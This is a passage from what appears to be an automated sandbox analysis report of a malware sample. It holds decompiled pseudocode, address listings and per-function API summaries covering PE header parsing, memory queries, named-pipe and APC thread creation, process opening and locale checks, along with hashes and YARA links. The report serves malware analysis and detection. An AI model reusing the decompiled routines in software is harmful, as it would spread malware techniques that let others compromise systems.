										__eflags =  *0x6e4b4240;
										if( *0x6e4b4240 != 0) {
											goto L60;
										}
										_t84 =  *0x6e4b41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e4b4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e4b41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e4b4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e4b41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e4b4240 = 1;
							__eflags =  *0x6e4b4240;
							if( *0x6e4b4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e4b4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e4b4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e4b41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                            0x6e4b249f
                                                            0x6e4b24a2
                                                            0x6e4b24a8
                                                            0x6e4b24c6
                                                            0x00000000
                                                            0x6e4b24c6
                                                            0x6e4b24b0
                                                            0x6e4b24b9
                                                            0x6e4b24bf
                                                            0x6e4b24ce
                                                            0x6e4b24d1
                                                            0x6e4b24d4
                                                            0x6e4b24de
                                                            0x6e4b24de
                                                            0x6e4b24e0
                                                            0x6e4b24e3
                                                            0x6e4b24e5
                                                            0x6e4b24e5
                                                            0x6e4b24e7
                                                            0x6e4b24ea
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b24ec
                                                            0x6e4b24ee
                                                            0x6e4b2554
                                                            0x6e4b2554
                                                            0x6e4b26b2
                                                            0x00000000
                                                            0x6e4b26b2
                                                            0x6e4b24f0
                                                            0x6e4b24f0
                                                            0x6e4b24f4
                                                            0x6e4b24f6
                                                            0x6e4b24f6
                                                            0x6e4b24f6
                                                            0x6e4b24f6
                                                            0x6e4b24f9
                                                            0x6e4b24fa
                                                            0x6e4b24fd
                                                            0x6e4b24fd
                                                            0x6e4b2501
                                                            0x6e4b2505
                                                            0x6e4b2513
                                                            0x6e4b2513
                                                            0x6e4b251b
                                                            0x6e4b2521
                                                            0x6e4b2523
                                                            0x6e4b2525
                                                            0x6e4b2535
                                                            0x6e4b2542
                                                            0x6e4b2546
                                                            0x6e4b254b
                                                            0x6e4b254d
                                                            0x6e4b25cb
                                                            0x6e4b25cb
                                                            0x6e4b254f
                                                            0x6e4b254f
                                                            0x6e4b254f
                                                            0x6e4b25cd
                                                            0x6e4b25cf
                                                            0x6e4b26b0
                                                            0x6e4b26b0
                                                            0x00000000
                                                            0x6e4b25d5
                                                            0x6e4b25d5
                                                            0x6e4b25dc
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b25e2
                                                            0x6e4b25e6
                                                            0x6e4b2642
                                                            0x6e4b2644
                                                            0x6e4b264c
                                                            0x6e4b264e
                                                            0x6e4b2650
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2652
                                                            0x6e4b2658
                                                            0x6e4b265a
                                                            0x6e4b265c
                                                            0x6e4b2671
                                                            0x6e4b2671
                                                            0x6e4b2673
                                                            0x6e4b26a2
                                                            0x6e4b26a9
                                                            0x00000000
                                                            0x6e4b26a9
                                                            0x6e4b2677
                                                            0x6e4b2678
                                                            0x6e4b267a
                                                            0x6e4b267c
                                                            0x6e4b267c
                                                            0x6e4b267e
                                                            0x6e4b2680
                                                            0x6e4b2682
                                                            0x6e4b2696
                                                            0x6e4b2696
                                                            0x6e4b2699
                                                            0x6e4b269b
                                                            0x6e4b269b
                                                            0x6e4b269c
                                                            0x6e4b269c
                                                            0x00000000
                                                            0x6e4b2684
                                                            0x6e4b2684
                                                            0x6e4b2684
                                                            0x6e4b268d
                                                            0x6e4b268e
                                                            0x6e4b2690
                                                            0x6e4b2692
                                                            0x6e4b2692
                                                            0x00000000
                                                            0x6e4b2684
                                                            0x6e4b2682
                                                            0x6e4b265e
                                                            0x6e4b2665
                                                            0x6e4b2665
                                                            0x6e4b2667
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2669
                                                            0x6e4b266a
                                                            0x6e4b266d
                                                            0x6e4b266f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b266f
                                                            0x00000000
                                                            0x6e4b2665
                                                            0x6e4b25e8
                                                            0x6e4b25eb
                                                            0x6e4b25f0
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b25f9
                                                            0x6e4b25fb
                                                            0x6e4b2601
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2607
                                                            0x6e4b260d
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2613
                                                            0x6e4b2615
                                                            0x6e4b261e
                                                            0x6e4b2622
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2628
                                                            0x6e4b262b
                                                            0x6e4b262d
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2634
                                                            0x6e4b2636
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2638
                                                            0x6e4b263c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b263c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2527
                                                            0x6e4b2527
                                                            0x6e4b2527
                                                            0x6e4b252e
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2530
                                                            0x6e4b2531
                                                            0x6e4b2533
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2533
                                                            0x6e4b255b
                                                            0x6e4b255d
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b256d
                                                            0x6e4b256f
                                                            0x6e4b2571
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2577
                                                            0x6e4b257e
                                                            0x6e4b25aa
                                                            0x6e4b25aa
                                                            0x6e4b25ac
                                                            0x6e4b25ae
                                                            0x6e4b25c2
                                                            0x6e4b25c4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b25b0
                                                            0x6e4b25b0
                                                            0x6e4b25b0
                                                            0x6e4b25b9
                                                            0x6e4b25ba
                                                            0x6e4b25bc
                                                            0x6e4b25be
                                                            0x6e4b25be
                                                            0x00000000
                                                            0x6e4b25b0
                                                            0x6e4b2580
                                                            0x6e4b2583
                                                            0x6e4b2585
                                                            0x6e4b2597
                                                            0x6e4b2597
                                                            0x6e4b259a
                                                            0x6e4b259c
                                                            0x6e4b259c
                                                            0x6e4b259d
                                                            0x6e4b259d
                                                            0x6e4b25a3
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2587
                                                            0x6e4b2587
                                                            0x6e4b2587
                                                            0x6e4b258e
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2590
                                                            0x6e4b2590
                                                            0x6e4b2591
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2591
                                                            0x6e4b2593
                                                            0x6e4b2595
                                                            0x6e4b25a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b25a8
                                                            0x00000000
                                                            0x6e4b2595
                                                            0x6e4b2507
                                                            0x6e4b250a
                                                            0x6e4b250d
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b250f
                                                            0x6e4b2511
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2511
                                                            0x6e4b24d6
                                                            0x6e4b24d8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E4B2546
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MemoryQueryVirtual
                                                            • String ID: @BKn$@BKn$@BKn
                                                            • API String ID: 2850889275-3961683012
                                                            • Opcode ID: 6aaa00e909a7844f3e367c84b01578d8cd9cb46b93bfe8d09ae9741b820a44e8
                                                            • Instruction ID: ee39b1b2bc79f61e04113d477c7142f7d2efa3713c100694ea44da4721bc028a
                                                            • Opcode Fuzzy Hash: 6aaa00e909a7844f3e367c84b01578d8cd9cb46b93bfe8d09ae9741b820a44e8
                                                            • Instruction Fuzzy Hash: 6F61D6306146029FDB59CEB9D4A0F5A33B9AB86394B20843BD455CB794FF70D883C678
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045736C0, Relevance: 6.1, APIs: 4, Instructions: 111stringnativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 04573716
                                                            • lstrlenW.KERNEL32(?), ref: 04573724
                                                            • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 0457374F
                                                            • lstrcpyW.KERNEL32(00000006,00000000), ref: 0457377C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Query$lstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3961825720-0
                                                            • Opcode ID: d52a1f4ba749a67f87daa6ea3f3852fca5bf5dc1f445fa45ca89712f54471fa2
                                                            • Instruction ID: acedbe013a5178b3f5a95c69d87d6d2c2c54966be1d1991fb0487c031d202ea6
                                                            • Opcode Fuzzy Hash: d52a1f4ba749a67f87daa6ea3f3852fca5bf5dc1f445fa45ca89712f54471fa2
                                                            • Instruction Fuzzy Hash: D1413BB1500209EFEF119FA8E984AAEBBBCFF04714F044169F905A6250DB75EA15FB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04564851, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04564873
                                                              • Part of subcall function 04564173: RtlNtStatusToDosError.NTDLL(00000000), ref: 045641AB
                                                              • Part of subcall function 04564173: SetLastError.KERNEL32(00000000), ref: 045641B2
                                                            • GetLastError.KERNEL32(?,00000318,00000008), ref: 04564983
                                                              • Part of subcall function 04579180: RtlNtStatusToDosError.NTDLL(00000000), ref: 04579198
                                                            • memcpy.NTDLL(00000218,04584EE0,00000100,?,00010003,?,?,00000318,00000008), ref: 04564902
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 0456495C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$Status$Last$memcpymemset
                                                            • String ID:
                                                            • API String ID: 945571674-0
                                                            • Opcode ID: 68599632981130c1237c1006fc5b2019d6de47c980572c22cfef73d52e21f3cb
                                                            • Instruction ID: d4cb7e6207278c732e6b3596240938f72153778a5413623509baf8bdeb391ce8
                                                            • Opcode Fuzzy Hash: 68599632981130c1237c1006fc5b2019d6de47c980572c22cfef73d52e21f3cb
                                                            • Instruction Fuzzy Hash: 8D316471941209AFEB20DF64E988AAAB7F8FB05344F10456EE546E7250EB30BE44EB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457D8BC, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0458C1A8,0458C144), ref: 0457D8E0
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 0457D92B
                                                              • Part of subcall function 0456E0F2: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,04580483), ref: 0456E109
                                                              • Part of subcall function 0456E0F2: QueueUserAPC.KERNELBASE(?,00000000,04575ADA,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E11E
                                                              • Part of subcall function 0456E0F2: GetLastError.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E129
                                                              • Part of subcall function 0456E0F2: TerminateThread.KERNEL32(00000000,00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E133
                                                              • Part of subcall function 0456E0F2: CloseHandle.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E13A
                                                              • Part of subcall function 0456E0F2: SetLastError.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E143
                                                            • GetLastError.KERNEL32(0457AD22,00000000,00000000), ref: 0457D913
                                                            • CloseHandle.KERNEL32(00000000), ref: 0457D923
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                                            • String ID:
                                                            • API String ID: 1700061692-0
                                                            • Opcode ID: aecc76eff09d4ee473b5ed29af4dabe45f9c084d2584009a1db3a500ceb001ac
                                                            • Instruction ID: 0b5ed44fd3f4970180f0a50c0eb4be03edf94fb5cb322c8b5d230cb12dc00b82
                                                            • Opcode Fuzzy Hash: aecc76eff09d4ee473b5ed29af4dabe45f9c084d2584009a1db3a500ceb001ac
                                                            • Instruction Fuzzy Hash: 21F0A471345211AFF3115B68BC88F7B77A8FB45375B100139FA56E32C1DA641C09EA75
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B1C6F, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E6E4B1C6F() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6e4b41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e4b41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6e4b41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6e4b41a8 = _t5;
					 *0x6e4b41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6e4b41a4 = _t6;
					if(_t6 == 0) {
						 *0x6e4b41a4 =  *0x6e4b41a4 | 0xffffffff;
					}
					return 0;
				}
			}









                                                            0x6e4b1c70
                                                            0x6e4b1c7e
                                                            0x6e4b1c86
                                                            0x6e4b1c8b
                                                            0x6e4b1cd5
                                                            0x6e4b1cd5
                                                            0x6e4b1c8d
                                                            0x6e4b1c95
                                                            0x6e4b1cd1
                                                            0x6e4b1cd3
                                                            0x6e4b1c97
                                                            0x6e4b1c97
                                                            0x6e4b1c9c
                                                            0x6e4b1caa
                                                            0x6e4b1caf
                                                            0x6e4b1cb5
                                                            0x6e4b1cbd
                                                            0x6e4b1cc2
                                                            0x6e4b1cc4
                                                            0x6e4b1cc4
                                                            0x6e4b1cce
                                                            0x6e4b1cce

                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E4B1A30,73B763F0,00000000), ref: 6E4B1C7E
                                                            • GetVersion.KERNEL32 ref: 6E4B1C8D
                                                            • GetCurrentProcessId.KERNEL32 ref: 6E4B1C9C
                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E4B1CB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Process$CreateCurrentEventOpenVersion
                                                            • String ID:
                                                            • API String ID: 845504543-0
                                                            • Opcode ID: 696ec6ab127f7650a5ace5951860859f856824294ceeb3e49f1ca57f83638d83
                                                            • Instruction ID: 46c449c6f1dd6e21748194872e7679dcbb8637f6085ab225bf229ab3919253e0
                                                            • Opcode Fuzzy Hash: 696ec6ab127f7650a5ace5951860859f856824294ceeb3e49f1ca57f83638d83
                                                            • Instruction Fuzzy Hash: 29F01D71E44A20AFEF50BFB9B80DB453BA4AF16791F14411AE215DA2C4E3B064429B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04577419, Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0457742D
                                                            • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0457746D
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04577476
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$InformationLastQueryStatusThread
                                                            • String ID:
                                                            • API String ID: 2450163249-0
                                                            • Opcode ID: 4c4db0468344aca0f47e97ecfd3769e835afaf76b44311139ec9e092f6f07856
                                                            • Instruction ID: 3340cf69e20f15197fce15b7f2fe6a36b2d2af67a15be8bf67782c9cec2177a2
                                                            • Opcode Fuzzy Hash: 4c4db0468344aca0f47e97ecfd3769e835afaf76b44311139ec9e092f6f07856
                                                            • Instruction Fuzzy Hash: D601E875A40108FEEB10AAA5FD04DAEBBBEFB88700F100065F941E6150EB75E914AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B105E, Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E6E4B105E(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}





                                                            0x6e4b1062
                                                            0x6e4b1073
                                                            0x6e4b107b
                                                            0x6e4b107d
                                                            0x6e4b1090
                                                            0x6e4b1090
                                                            0x6e4b109a

                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6E4B178D,?,6E4B1A94,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B1073
                                                            • GetSystemDefaultUILanguage.KERNEL32(?,?,6E4B178D,?,6E4B1A94,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B107D
                                                            • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E4B178D,?,6E4B1A94,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B1090
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Language$DefaultInfoLocaleNameSystem
                                                            • String ID:
                                                            • API String ID: 3724080410-0
                                                            • Opcode ID: 651af5d1c458f650d692f68fcb1f21c26ba497e3b777a023cf79dea3a2bd1655
                                                            • Instruction ID: 3d45e7c2b7087de19b108063331e4b740e3389283ed77564da63f8a6fa29bd2a
                                                            • Opcode Fuzzy Hash: 651af5d1c458f650d692f68fcb1f21c26ba497e3b777a023cf79dea3a2bd1655
                                                            • Instruction Fuzzy Hash: C7E04F64A40248B7EB00E7F29D0AFBD72BCAF01B4AF500049FB01E61C0D6B49A04A775
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04576F70, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 04576FA1
                                                            • RtlNtStatusToDosError.NTDLL(C000009A), ref: 04576FD8
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                                            • String ID:
                                                            • API String ID: 2533303245-0
                                                            • Opcode ID: 1085ab3882b63f9ea333fa349906fe2b30f79b51c209fed1de0424edeb81cb8d
                                                            • Instruction ID: 56ccd365732ccadf3544ed74b6c0f96064a533d633e2096089a45fc5105ef988
                                                            • Opcode Fuzzy Hash: 1085ab3882b63f9ea333fa349906fe2b30f79b51c209fed1de0424edeb81cb8d
                                                            • Instruction Fuzzy Hash: FA01DB36502935ABD7215A54A914AAFB668BF81B71F050138ED05B7104DB35BD00B6D0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456D00C, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 0456D02B
                                                            • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 0456D043
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: InformationProcessQuerymemset
                                                            • String ID:
                                                            • API String ID: 2040988606-0
                                                            • Opcode ID: 80cf0e6b0989c5640e21b01eaf2ba576d8011bec45176911a01753c54b42ec26
                                                            • Instruction ID: c314e1144d74030b6ce0953f0448e3cd61b0e209e2b085f81ccff7b0a5645b99
                                                            • Opcode Fuzzy Hash: 80cf0e6b0989c5640e21b01eaf2ba576d8011bec45176911a01753c54b42ec26
                                                            • Instruction Fuzzy Hash: 81F068B590021DBAEB60DA90DC09FDE7B7CFB04750F004060BA08E6081E770EB49DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04564173, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 045641AB
                                                            • SetLastError.KERNEL32(00000000), ref: 045641B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$LastStatus
                                                            • String ID:
                                                            • API String ID: 4076355890-0
                                                            • Opcode ID: eb94e36920c1ae32774d8e042f52edb824ccbf328476b08b0220ae3600f47660
                                                            • Instruction ID: 76d787b5dfe00b1bab718c0f8845bfb6aabf52bcaf73338107257421ead6b721
                                                            • Opcode Fuzzy Hash: eb94e36920c1ae32774d8e042f52edb824ccbf328476b08b0220ae3600f47660
                                                            • Instruction Fuzzy Hash: 17F0FE71910309FBEB05DBD4D909BDE77BCFB55305F10404CB601A6081EBB8AB08EB68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457A42B, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0457A458
                                                            • SetLastError.KERNEL32(00000000,?,0456493D,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 0457A45F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$LastStatus
                                                            • String ID:
                                                            • API String ID: 4076355890-0
                                                            • Opcode ID: 7fbf975c446f97ef73fea287018e10f5c90fed85625bb215784f1945685435e6
                                                            • Instruction ID: 279245345faf65aeb357d41cd3e8503a548e0575da0a3655fe8af9775c334bcc
                                                            • Opcode Fuzzy Hash: 7fbf975c446f97ef73fea287018e10f5c90fed85625bb215784f1945685435e6
                                                            • Instruction Fuzzy Hash: 7EE0123224021AABCF015ED5AC08D9F7B59FB48741B044424BA01D6521DB3ADD20BBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457DBCE, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0457DBFB
                                                            • SetLastError.KERNEL32(00000000,?,04579542,?,00000000,00000000,00000004,?,00000000,00000000,73B74EE0,00000000), ref: 0457DC02
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$LastStatus
                                                            • String ID:
                                                            • API String ID: 4076355890-0
                                                            • Opcode ID: 13a359080878bce087c3050989af4bcec66fabc73b2c07c3f05c01487361c12b
                                                            • Instruction ID: 0163515fe8495b3a2c835f1bd01d3fe3ce268039d587244b4680da3603d85969
                                                            • Opcode Fuzzy Hash: 13a359080878bce087c3050989af4bcec66fabc73b2c07c3f05c01487361c12b
